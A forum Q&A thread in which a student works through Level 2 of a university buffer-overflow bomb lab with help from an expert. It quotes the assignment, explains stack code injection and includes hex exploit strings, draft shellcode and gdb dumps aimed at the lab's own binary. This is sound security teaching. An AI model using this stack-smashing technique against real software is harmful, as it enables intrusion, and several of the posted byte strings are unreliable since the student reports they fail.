Question

Buffer Overflow Bomb Phase 2

Asked by: purewin

I'm starting phase 2 but I'm a little confused on what I need to do for it. Do I need to write my own assembly code for this or merely reference some code in the program thats already written?

Level 2: Firecracker (30 pts)

A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine instructions. The exploit string then overwrites the return pointer with the starting address of these instructions. When the calling function (in this case getbuf()) executes its ret instruction, the program will start executing the instructions on the stack rather than returning. With this form of attack, you can get the program to do almost anything. The code you place on the stack is called the exploit code. This style of attack is tricky, though, because you must get machine code onto the stack and set the return pointer to the start of this code.
Within the file bufbomb there is a function bang() having the following C code:

int global_value = 0;
void bang(int val)
{
entry_check(2); /* Make sure entered this function properly */
if (global_value == cookie) {
printf("Bang!: You set global_value to 0x%x\n", global_value);
validate(2);
}
else
printf("Misfire: global_value = 0x%x\n", global_value);
exit(0);
}
Similar to Levels 0 and 1, your task is to get bufbomb to execute the code for bang() rather than returning to test. Before this, however, you must set global variable global_value to your teams cookie. Your exploit code should set global_value, push the address of bang() on the stack, and then execute a return instruction to cause a jump to the code for bang().
Some Advice:

You can use GDB to get the information you need to construct your exploit string. Set a breakpoint within getbuf() and run to this breakpoint. Determine parameters such as the address of global_value and the location of the buffer.
Determining the byte encoding of instruction sequences by hand is tedious and prone to errors. You can let tools do all of the work by writing an assembly code file containing the instructions and data you want to put on the stack. Assemble this file with gcc and disassemble it with objdump. You should be able to get the exact byte sequence that you will type at the prompt. (A brief example of how to do this is included at the end of this writeup.)
Keep in mind that your exploit string depends on your machine, your compiler, and even your teams cookie. Do all of your work on the machine cs367.vsnet.gmu.edu, and make sure you include the proper team name on the command line to bufbomb.
Our solution requires 16 bytes of exploit code. Fortunately, there is sufficient space on the stack, because we can overwrite the stored value of %ebp. This stack corruption will not cause any problems, since bang causes the program to exit directly.
Watch your use of address modes when writing assembly code. Note that movl $0x4, %eax moves the value 0x00000004 into register %eax; whereas movl 0x4, %eax moves the value at memory location 0x00000004into %eax. Since that memory location is usually undefined, the second instruction will cause a segfault!
Do not attempt to use either a jmp or a call instruction to jump to the code for bang. These instructions uses PC-relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack and use the ret instruction.

This Question has been solved and asker verified All Experts Exchange premium technology solutions are available to subscription members.

Subscribe now for full access to Experts Exchange and get

Instant Access to this Solution

  • Plus...
  • 30 Day FREE access, no risk, no obligation
  • Collaborate with the world's top tech experts
  • Unlimited access to our exclusive solution database
  • Never be left without tech help again

Subscribe Now

Asked On
2009-11-03 at 13:24:16ID24868943
Topics

Assembly Programming Language

,

C Programming Language

Participating Experts
1
Points
500
Comments
47

Trusted by hundreds of thousands everyday for fast, accurate and reliable tech support.

  • "The time we save is the biggest benefit of Experts Exchange to Warner Bros. What could take multiple guys 2 hours or more each to find is accessed in around 15 minutes on Experts Exchange." Mike Kapnisakis, Warner Bros.
  • "Our team likes having a resource that is more secure than just using Google and most experts using this service really know their stuff. It's nice to look here first versus using Google." Dayna Sellner, Lockheed Martin
  • "Anytime that I've been stumped with a problem, 9 out of 10 times Experts Exchange has either the accepted solution or an open discussion of the potential solution to the problem." Kenny Red, eBay Inc.

See what Experts Exchange can do for you.

Got a question?

We've got the answer.

Experts Exchange has been collecting answers to technology questions since 1996…3 million and counting! If you have a question, chances are we already have your answer.

Screenshot of Experts Exchange Knowledgebase

Need individual assistance?

Our experts are ready to help.

If you can't find the exact answer you're looking for, ask our exclusive community of 50,000 experts. You’ll get a personalized answer from a trusted professional.

Screenshot of Experts Exchange Knowledgebase

Want to learn from the best?

Read articles from industry experts.

Thousands of free tech tips, tricks, how-to’s and tutorials are available in our peer reviewed articles section. See for yourself how smart our experts are, no login required.

Screenshot of an Article

Working on a long term project?

Store your work and research.

Save solutions to your questions, answers you’ve discovered through searching plus helpful articles in your personal knowledgebase for easy future access.

Screenshot of Experts Exchange Knowledgebase

Access the answers to your technology questions today.

Subscribe Now

30-day free trial. Register in 60 seconds.

What Makes Experts Exchange Unique?

Members of the expert community talk about why the experience at Experts Exchange is different than what you will find anywhere else.

Trusted by the world's most respected brands.

image of each brand's logo

Faithfully serving IT professionals since 1996.

Experts Exchange Logo

Try it out and discover for yourself.

Subscribe Now

30-day free trial. Register in 60 seconds.

Related Solutions

  1. defuse binary bomb
    I have a homework in which I have to disassembler the code and figure out how to defuse the bomb. Can anyone help please thanks bomb-quiet: file format elf32-i386 Disassembly of section .init: 08048718 <_init>: 8048718: 55 push %ebp 804871...
  2. buffer overflow bomb
    hi there I have a homework in which I need to enter a string so that the buffer bomb does not exploit and need some help. Here is the disassembly code for the bomb -bash-3.1$ objdump -d bufbomb bufbomb: file format elf32-i386 Disassembly of section .init: 080485fc <...
  3. defusing a bomb using assembly code
    This is the famous bomblab. I really need help with phase_3 because I'm almost giving up. this is the code: 08048ec1 <phase_3>: 8048ec1: 55 push %ebp 8048ec2: 89 e5 mov %esp,%ebp 8048ec4: 83 ec 28 ...
  4. Buffer Bomb Problem
    Here is the object dump of my the bomb program: bufbomb: file format elf32-i386 Disassembly of section .init: 080486c8 <_init>: 80486c8: 55 push %ebp 80486c9: 89 e5 mov %esp,%ebp 80486cb: 53 push %e...
  5. Buffer Bomb -  Final Phase
    Here is the object dump of my the bomb program: bufbomb: file format elf32-i386 Disassembly of section .init: 080486c8 <_init>: 80486c8: 55 push %ebp 80486c9: 89 e5 mov %esp,%ebp 80486cb: 53 ...
  6. Binary Bomb - Phase_5 - Assembly
    Hi everyone, It's the classic binary bomb lab, and I'm completely stuck on phase 5. Here's what I got:

Free Tech Articles

  1. WARNING: 5 Reasons why you should NEVER fix a computer for free.
    It is in our nature to love the puzzle. We are obsessed. The lot of us. We love puzzles. We love the challenge. We thrive on finding the answer. We hate disarray. It bothers us deep in our soul. W...
  2. SCCM OSD Basic troubleshooting
    SCCM 2007 OSD is a fantastic way to deploy operating systems, however, like most things SCCM issues can sometimes be difficult to resolve due to the sheer volume of logs to sift through and the dispe...
  3. Migrate Small Business Server 2003 to Exchange 2010 and Windows 2008 R2
    This guide is intended to provide step by step instructions on how to migrate from Small Business Server 2003 to Windows 2008 R2 with Exchange 2010. For this migration to work you will need the fo...
  4. Create a Win7 Gadget
    This article shows you how to create a simple "Gadget" -- a sort of mini-application supported by Windows 7 and Vista. Gadgets can be dropped anywhere on the desktop to provide instant information, ...
  5. Outlook continually prompting for username and password
    There have been a lot of questions recently regarding Outlook prompting for a username and password whilst using Exchange 2007. There are a few reasons why this would happen and I will try to cover t...
  6. Backup Exchange 2010 Information Store using Windows Backup
    There seems to be quite a lot of confusion around the ability to backup Exchange 2010 using the built in Windows Backup feature. This stems from the omission of this feature prior to Exchange 2007 s...

Cloud Class Webinars

  1. Avoiding Bugs in Microsoft Access
    Alison Balter takes and in-depth look at avoiding bugs in Access. In this webinar you will learn about using the immediate window to debug your applications, invoking the debugger, using breakpoints to troubleshoot, stepping through code, setting the next statement to execute, ...
  2. Top 10 Best New Features in Visio 2010
    Scott Helmers gives live demonstrations of the top 10 new features in Visio 2010. This webinar will teach you how to create compelling diagrams by adding shapes to the page with a single click, linking the shapes in a diagram to data in Excel (or SQL Server, or SharePoint), ...
  3. IT Consultant Business Secrets Revealed
    Michael Munger, Experts Exchange tech pro and IT consultant, pulls back the curtain on his very successful businesses and answers question on every IT consultant and business owner should know about. He shares secrets on what he did to solve the 5 most common problems in IT, ...
  4. Disaster Recovery and Business Continuity
    Quest CTO, Mike Billon, gives an overview of the steps involved in building a dunamic disaster recovery plan. Through case studies and an examination of software/hardware tooles for monitoring and testing, you'll gain a better understandin of where you are, where you want ...
  5. Organize Your Visio Diagrams with Containers and Lists
    Scott Helmers uses cross functional flowcharts, wireframe diagrams, data graphic legends and seating charts to teach you: how to ustilize all three new structured diagram components in Visio 2010, the best practices for organizeing shapes in previous version of Visio, how to organize ...
  6. How to Us Objects, Properties, Events and Methods in Microsoft Access
    Alison Dalter gives an in-depbth look at objects, properties, events and methods in Microsoft Access. In this webinar you will learn about using the object browser, referring to objects, working with properties and methods, working with object variables, understanding the ...

Join the Community

Give a Little. Get a Lot.

Join the community of experts here and help other tech pros by answering question in your area of expertise. You can earn FREE access to all Experts Exchange's premium features and resources.

Join the Community

Answers

 

by: Infinity08Posted on 2009-11-03 at 13:29:32ID: 25733961

>>  Do I need to write my own assembly code for this or merely reference some code in the program thats already written?

The idea is to make your own code part of the buffer used for overflowing. When you overwrite the return address, you make it jump to that code, and execute from there. So, the exploit string might be something like :

        <padding><return address><exploit code>

This is what the exploit code should do :

>> Your exploit code should set global_value, push the address of bang() on the stack, and then execute a return instruction to cause a jump to the code for bang().

 

by: purewinPosted on 2009-11-03 at 22:06:31ID: 25736802

Right but do I need to write assembly code for this or just do the same thing I've been doing and use the bytes?

 

by: purewinPosted on 2009-11-03 at 22:21:02ID: 25736870

Not sure how I would begin going about editing the global variable either. It says I need to change it before changing/calling bang() but if I modify the string before the call to bang then that call won't fall into the proper address... Do I still keep the call to bang() in the same place or do I need to add something before it?

 

by: purewinPosted on 2009-11-03 at 22:37:56ID: 25736946

Okay well I'm pretty sure that the global variable is stored here
0x08048ce2 <bang+18>:   mov    0x804a1c0,%eax

Do I just need to call bang() then use some exploit string to overwrite 0x0804alc0?

 

by: Infinity08Posted on 2009-11-04 at 02:41:49ID: 25738000

>> Right but do I need to write assembly code for this or just do the same thing I've been doing and use the bytes?

Both :)

The <exploit code> part of the string you have to enter will be assembled instructions. So, you'll have to write the assembly code for :

>> Your exploit code should set global_value, push the address of bang() on the stack, and then execute a return instruction to cause a jump to the code for bang().

then assemble it, and place the resulting bytes in your string.


>> Do I still keep the call to bang() in the same place or do I need to add something before it?

In your assembly code, you'll first have to set the global variable, and then call bang.

 

by: purewinPosted on 2009-11-04 at 18:45:50ID: 25746325

Would this code do the required operations?

movl 0x5d5f53de,eax
call 0x08048cd0

0x5d5f53de is my cookie and  0x08048cd0 is the address for bang(). If this code will work how would I convert it all to bytes?

 

by: purewinPosted on 2009-11-04 at 18:54:52ID: 25746364

er the movl code should be
movl 0x5d5f53de,0x08048a1c0

right?

 

by: purewinPosted on 2009-11-04 at 18:56:56ID: 25746377

And if that code is correct im unsure of how to convert the movl and call operations into byte code...

 

by: purewinPosted on 2009-11-04 at 18:57:53ID: 25746385

Just posting the corrected code:

movl $0x5d5f53de, 0x804a1c0
call 0x08048cd0

 

by: purewinPosted on 2009-11-04 at 19:58:58ID: 25746659

not sure how to get the byte code for these I think I figured out what movl and call are in byte but I don't see how to get the converted byte code for the address being called...

 

by: purewinPosted on 2009-11-04 at 20:45:48ID: 25746842

I don't get how they byte sequence for call is generated i know the instruction call is e8 but for example

8048e5d:       e8 6e fa ff ff          call   80488d0 <save_char>

i know e8 is call but I don't get where 6e fa ff ff was generated. Any thoughts?

 

by: Infinity08Posted on 2009-11-04 at 23:34:46ID: 25747401

>> Would this code do the required operations?

Let me quite two phrases from your assignment to answer your question :

>> Note that movl $0x4, %eax moves the value 0x00000004 into register %eax; whereas movl 0x4, %eax moves the value at memory location 0x00000004into %eax. Since that memory location is usually undefined, the second instruction will cause a segfault!

>> Do not attempt to use either a jmp or a call instruction to jump to the code for bang. These instructions uses PC-relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack and use the ret instruction.


>> 8048e5d:       e8 6e fa ff ff          call   80488d0 <save_char>
>> 
>> i know e8 is call but I don't get where 6e fa ff ff was generated.

It's a relative offset (which is the reason you shouldn't be using call, even though I suggested it earlier) : 0xFFFFFA6E (negative value).

 

by: purewinPosted on 2009-11-04 at 23:43:10ID: 25747424

Right I've moved on and trying to do what it says and push the address of bang and then return instruction. Should the flow of my exploit string be this

(filler string)  -> (set global variable) -> (push bang address) -> (return instruction)

And to do this I write the code in a separate program and then compile it and then objdump it and use the generated byte code it gives for my exploit string?

So this code
movl $0x5d5f53de, %0x0804a1c0
won't overwrite the necessary variable?

 

by: purewinPosted on 2009-11-04 at 23:56:48ID: 25747470

I'm unsure about how I would go about making it execute my code. Would I keep my original buffer up to the return call in getbut() and then use the converted byte code? But wouldn't that cause a segmentation fault? I don't understand how I would be able to execute all the needed instructions since the converted byte code is longer then 4 bytes.

 

by: Infinity08Posted on 2009-11-05 at 00:36:48ID: 25747613

>> (filler string)  -> (set global variable) -> (push bang address) -> (return instruction)

You need to also include a jump address to overwrite the return value. That address should point to your own exploit code.


>> And to do this I write the code in a separate program and then compile it and then objdump it and use the generated byte code it gives for my exploit string?

For example, or just construct it yourself by looking at similar instructions.


>> I don't understand how I would be able to execute all the needed instructions since the converted byte code is longer then 4 bytes.

If you overwrite the return value (just like in phase one), and let it point to your exploit code, the program will happily start executing your exploit code.

 

by: purewinPosted on 2009-11-05 at 01:03:51ID: 25747721

Looks like I shouldn't use a jump command...

>>Do not attempt to use either a jmp or a call instruction to jump to the code for bang. These instructions uses PC-relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack and use the ret instruction.

Or is this just saying don't use it after my exploit code has executed?

 

by: purewinPosted on 2009-11-05 at 01:13:52ID: 25747767

I still don't really understand this. I keep my original exploit string that overflows up to the return call in getbuf and at that point I need to change the global variable and after that I need to push the address for bang() onto the stack and then execute a return instruction? Which would mean everything is taking place in getbuf() and then the return would call bang()?

 

by: Infinity08Posted on 2009-11-05 at 01:14:39ID: 25747776

>> Or is this just saying don't use it after my exploit code has executed?

It is talking about the part where you jump to the bang function.

You'll need to "jump" twice :

1) once by overwriting the return address of the getbuf function call, to start executing your exploit code
2) once inside the exploit code by executing a ret instruction to start executing the bang function.

 

by: purewinPosted on 2009-11-05 at 01:21:38ID: 25747808

Okay makes a little more sense I think. At the return call in getbuf() I should jump to my exploit code which would start after that jump and then the return in my exploit code should call the bang() address that should be pushed into ebp?

 

by: purewinPosted on 2009-11-05 at 01:40:46ID: 25747891

Also for example my
movl $0x5d5f53de, %0x0804a1c0
in bytes its
c7 05 c0 a1 04 08 de  53 5f 5d
which is two extra bytes how do those fit in? Wouldn't they be broken up like this
alc005c7 53de0804 5d5f

or would the extra bytes be interpreted as instructions and the addresses fall together correctly?

 

by: Infinity08Posted on 2009-11-05 at 01:47:49ID: 25747922

>> At the return call in getbuf() I should jump to my exploit code which would start after that jump and then the return in my exploit code should call the bang() address that should be pushed into ebp?

That's it.

>> or would the extra bytes be interpreted as instructions and the addresses fall together correctly?

An instruction is identified by the first byte, and is then followed by its arguments (if any). The next instruction immediately follows it, and again starts with 1 byte to identify the instruction, followed by its arguments etc.

If you need padding between instructions, you can use the nop instruction.

 

by: purewinPosted on 2009-11-05 at 01:53:14ID: 25747945

okay so say I want to use the movl instruction its defined by c7 as a byte would I put something like
c7 nop nop nop c0 a1 04 08 de 53 5f 5d
I still have to find the byte for nop but is that the general idea?

 

by: purewinPosted on 2009-11-05 at 02:19:18ID: 25748054

I don't see how I would know what address to jump to once reaching the return instruction getbuf(). Would I just jump to
0x08048f58 <getbuf+24>: nop
which is right after it and overwrite that with my code?

 

by: purewinPosted on 2009-11-05 at 02:24:31ID: 25748087

Here is my code so far:

jmp 0x08048f58
movl $0x5d5f53de, 0x0804a1c0
movl 0x08048cd0, %ebp
ret

I jump to the address right after the return call then I overflow that address and the next with the movl instructions first setting 0x08048a1c0 (global variable) to my cookie 0x5d5f53de and then setting ebp equal to the address of bang() and then issuing a ret instruction which reads the address at ebp and calls bang.

Look good?

 

by: purewinPosted on 2009-11-05 at 03:16:22ID: 25748335

Hmmmm, I'm not so sure about how to do the first jump to my exploit code. I overwrite the bytes at the return address with my jump byte code and then just add in byte code for the rest of my code right after?

 

by: Infinity08Posted on 2009-11-05 at 03:57:19ID: 25748548

>> would I put something like c7 nop nop nop c0 a1 04 08 de 53 5f 5d

No. The arguments immediately follow the opcode.

Ignore nops for now ... You probably won't need them.


>> I don't see how I would know what address to jump to once reaching the return instruction getbuf().

gdb can tell you at which address your exploit code starts ...


>> Hmmmm, I'm not so sure about how to do the first jump to my exploit code.

Simply overwrite the return address of getbuf on the stack with the address of your exploit code.


>> I overwrite the bytes at the return address with my jump byte code and then just add in byte code for the rest of my code right after?

If you don't overwrite the return address with a valid address, then when the code returns from getbuf, it will return to some invalid location, and likely crash. You need to provide a valid address - namely the  address where your exploit code starts.

 

by: purewinPosted on 2009-11-05 at 04:26:01ID: 25748693

The address I need to jump to would be 0xbfffb408 according to this correct?

0x08048dd0 in Gets ()
(gdb) x/32xw $sp
0xbfffb3ec:     0x08048f51      0xbfffb3fc      0x00000000      0x0804a108
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd1 in Gets ()
(gdb) x/32xw $sp
0xbfffb3e8:     0xbfffb408      0x08048f51      0xbfffb3fc      0x00000000
0xbfffb3f8:     0x0804a108      0xbfffb434      0x00857ff4      0x00000003
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb)

 

by: purewinPosted on 2009-11-05 at 04:36:46ID: 25748759

34 b4 ff bf f4 7f 85 00 03 00 00 00 28 b4 ff bf c7 05 c0 a1 48 80 de 53 5f 5d 68 d0 8c 04 08 c3
Is my current exploit string the address I need to call would go before c7 correct?

Is the address I'm looking for in getbuf() or Gets()?

 

by: purewinPosted on 2009-11-05 at 05:06:35ID: 25748964

I feel like this exploit string should work...
34 b4 ff bf f4 7f 85 00 03 00 00 00 28 b4 ff bf 0c b4 ff bf c7 05 c0 a1 48 80 de 53 5f 5d 68 d0 8c 04 08 c3 fc b3 ff bf
But it keeps saying illegal instruction...

 

by: purewinPosted on 2009-11-05 at 05:18:04ID: 25749056

I know my code is stored at the address 0xbfffb3fc but I can't get my string to work....

Breakpoint 1, 0x08048f4c in getbuf ()
(gdb) si
0x08048dd0 in Gets ()
(gdb) x/32x 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd1 in Gets ()
(gdb) si
0x08048dd3 in Gets ()
(gdb) x/32x 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) c
Continuing.

Breakpoint 2, 0x08048f57 in getbuf ()
(gdb) x/32x 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0xbfffb40c      0xa1c005c7      0x53de8048      0xd0685d5f
0xbfffb41c:     0xc308048c      0xbfffb3fc      0xdead00e9      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb)

 

by: Infinity08Posted on 2009-11-05 at 08:03:10ID: 25750864

>> But it keeps saying illegal instruction...

Use gdb to see what happens. Check whether it jumps correctly to the start of your exploit code, and if so, where it starts going wrong.

 

by: purewinPosted on 2009-11-05 at 12:55:04ID: 25753903

I can't seem to figure out what I'm doing wrong. I've stepped through the code but nothing is jumping out at me...any hints to point me in the right direction?

 

by: purewinPosted on 2009-11-05 at 13:02:26ID: 25753990

If anything it looks like my code isn't fallling together properly in 0xbfffb3fc? Is that causing the illega instruction?

(gdb) x/32xw $ebp
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb468:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb478:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32xw ($ebp+8)
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb470:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb480:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd3 in Gets ()
(gdb) x/32xw $ebp
0xbfffb3e8:     0xbfffb408      0x08048f51      0xbfffb3fc      0x00000000
0xbfffb3f8:     0x0804a108      0xbfffb434      0x00857ff4      0x00000003
0xbfffb408:     0xbfffb428      0x08048f7e      0x00000003      0x008584c0
0xbfffb418:     0x08049983      0xbfffb434      0xbfffb434      0xdeadbeef
0xbfffb428:     0xbfffe9f8      0x08049056      0x08049983      0x000000f4
0xbfffb438:     0x00003560      0x00000000      0xf4f4f4f4      0xf4f4f4f4
0xbfffb448:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb458:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32xw ($ebp+8)
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32w 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) si
0x08048dd4 in Gets ()
(gdb) x/32w 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0x08048f7e      0x00000003      0x008584c0      0x08049983
0xbfffb41c:     0xbfffb434      0xbfffb434      0xdeadbeef      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) c
Continuing. 
Breakpoint 2, 0x08048f57 in getbuf ()
(gdb) x/32w 0xbfffb3fc
0xbfffb3fc:     0xbfffb434      0x00857ff4      0x00000003      0xbfffb428
0xbfffb40c:     0xbfffb40c      0xa1c005c7      0x53de8048      0xd0685d5f
0xbfffb41c:     0xc308048c      0xffb3fce9      0xde00c7bf      0xbfffe9f8
0xbfffb42c:     0x08049056      0x08049983      0x000000f4      0x00003560
0xbfffb43c:     0x00000000      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb44c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb45c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb46c:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) 
                                              
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:
44:
45:
46:
47:
48:
49:
50:
51:
52:
53:
54:
55:
56:
57:
58:
59:
60:
61:
62:
63:
64:
65:
66:
67:
68:
69:
70:
71:
72:

Select allOpen in new window

 

by: purewinPosted on 2009-11-05 at 19:34:06ID: 25756409

I don't see why this current string isn't working...I'm stepping through the code and I can't seem to find what I'm missing/doing wrong.
34 b4 ff bf f4 7f 85 00 03 00 00 00 28 b4 ff bf 0c b4 ff bf c7 05 c0 a1 04 08 de 53 5f 5d 68 d0 8c 04 08 c3 fc b3 ff bf
(padding)
34 b4 ff bf f4 7f 85 00 03 00 00 00 28 b4 ff bf 0c b4 ff bf

(set global to cookie)
c7 05 c0 a1 04 08 de 53 5f 5d

(push bang address)
 68 d0 8c 04 08

(ret to my exploit code)
c3 fc b3 ff bf

Also here is the code dump for Gets and getbuf

Dump of assembler code for function Gets:
0x08048dd0 <Gets+0>:    push   %ebp
0x08048dd1 <Gets+1>:    mov    %esp,%ebp
0x08048dd3 <Gets+3>:    push   %edi
0x08048dd4 <Gets+4>:    push   %esi
0x08048dd5 <Gets+5>:    push   %ebx
0x08048dd6 <Gets+6>:    sub    $0xc,%esp
0x08048dd9 <Gets+9>:    mov    0x804a1ac,%ebx
0x08048ddf <Gets+15>:   movl   $0x0,0x804a1c4
0x08048de9 <Gets+25>:   mov    0x8(%ebp),%esi
0x08048dec <Gets+28>:   test   %ebx,%ebx
0x08048dee <Gets+30>:   je     0x8048e62 <Gets+146>
0x08048df0 <Gets+32>:   mov    $0x1,%edi
0x08048df5 <Gets+37>:   movl   $0x0,0xfffffff0(%ebp)
0x08048dfc <Gets+44>:   lea    0x0(%esi),%esi
0x08048e00 <Gets+48>:   mov    0x804a1a0,%eax
0x08048e05 <Gets+53>:   mov    %eax,(%esp)
0x08048e08 <Gets+56>:   call   0x80486b4 <_IO_getc@plt>
0x08048e0d <Gets+61>:   cmp    $0xffffffff,%eax
0x08048e10 <Gets+64>:   mov    %eax,%ebx
0x08048e12 <Gets+66>:   je     0x8048e74 <Gets+164>
0x08048e14 <Gets+68>:   cmp    $0xa,%eax
0x08048e17 <Gets+71>:   je     0x8048e74 <Gets+164>
0x08048e19 <Gets+73>:   call   0x80486c4 <__ctype_b_loc@plt>
